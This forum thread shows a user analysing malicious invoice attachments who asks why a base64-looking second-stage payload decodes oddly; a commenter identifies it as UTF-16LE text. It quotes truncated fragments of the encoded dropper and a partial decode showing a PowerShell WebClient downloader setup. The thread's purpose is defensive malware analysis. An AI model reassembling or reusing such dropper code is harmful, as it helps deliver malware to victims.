# text encoding & spam

Tags: text, encoding

everybody.
Please, help me fight my little personal war against spam/malware. I'm receiving spam with obviously fake attachments in form of .doc bills or invoices.
This fake docs contain macro code that I'm able to decrypt using various tools. Generally such code tries to download an encripted text file which is actually further VBA code which, if executed, tries to download the *real* malware in form of an EXE file.
The encrypted text file was usually a simple base64 encoded string.
Using normal base64 encoding/decoding tools was more than enough to decrypt the content and identify the IP address from which the malware tries to download the exe virus.
Recently things have changed. Now the encrypted text file contains what is apparently base64 encoding but it is not.
The content is something like:

```
PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=
```

which resembles base64 encoding. But if you try and decode it using base64, you get something like:

```
<^@t^@e^@x^@t^@1^@0^@>^@$^@h^@y^@g^@q^@u^@d^@g^@a^@h^@s^@=^@'^@n^@u^@d^@q^@h^@w^@i^@u^@d^@h^@q^@w^@d^@q^@w^@'^@;^@
^@
^@$^@g^@f^@y^@w^@u^@g^@h^@a^@m^@s^@=^@'^@1^@2^@j^@h^@3^@g^@1^@2^@h^@ ^@1^@2^@g^@3^@j^@h^@1^@2^@3^@1^@2^@3^@'^@;^@
^@
^@$^@d^@o^@w^@n^@ ^@=^@ ^@N^@e^@w^@-^@O^@b^@j^@e^@c^@t^@ ^@S^@y^@s^@t^@e^@m^@.^@N^@e^@t^@.^@W^@e^@b^@C^@l^@i^@e^@n^@t^@;^@
```

instead of plain text (the VBS code that downloads the exe file).
Can anyone help me find the way to decode such dirt?
Thanks in advance!

Comment: That looks like valid base64 encoding of UTF16-LE text - what's your question?

Comment: @Toby Let me put it another way. By issuing, for example, `base64 --decode encoded.txt > decoded.tx`, decoded.txt usually contains something like _Sub WorkbookOpen() dim uri as string uri = 'thespammeruri.com' ..._ In this case I get instead something unreadable. My question is: is it really base64 or is is it something different? You are telling that in your opinion it _is_ base64.

Comment: Gotcha! In the text editor I've simply deleted away all ^@ chars and I have the plain text of the virus. Thank you Toby.